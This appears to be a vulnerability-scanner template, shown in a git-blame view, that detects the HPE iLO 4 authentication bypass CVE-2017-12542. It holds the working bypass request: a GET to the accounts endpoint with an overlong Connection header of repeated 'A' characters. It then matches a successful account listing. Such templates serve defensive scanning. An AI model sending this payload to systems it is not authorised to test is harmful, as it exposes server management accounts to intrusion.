2021-03-23 11:26:08 +00:00
|
|
|
id: CVE-2017-12542
|
|
|
|
|
|
|
|
info:
|
2021-04-17 15:48:58 +00:00
|
|
|
name: ILO4 Authentication bypass
|
2021-03-23 11:26:08 +00:00
|
|
|
author: pikpikcu
|
|
|
|
severity: critical
|
2021-04-10 23:48:05 +00:00
|
|
|
description: A authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 was found.
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2021-08-19 14:44:46 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-12542
|
|
|
|
- https://www.exploit-db.com/exploits/44005
|
2021-04-17 15:48:58 +00:00
|
|
|
tags: cve,cve2017,ilo4,hpe
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
|
|
cvss-score: 10.00
|
|
|
|
cve-id: CVE-2017-12542
|
2021-03-23 11:26:08 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/rest/v1/AccountService/Accounts"
|
|
|
|
headers:
|
|
|
|
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "iLO User"
|
2021-04-17 15:48:58 +00:00
|
|
|
part: body
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "application/json"
|
|
|
|
part: header
|
2021-03-23 11:26:08 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|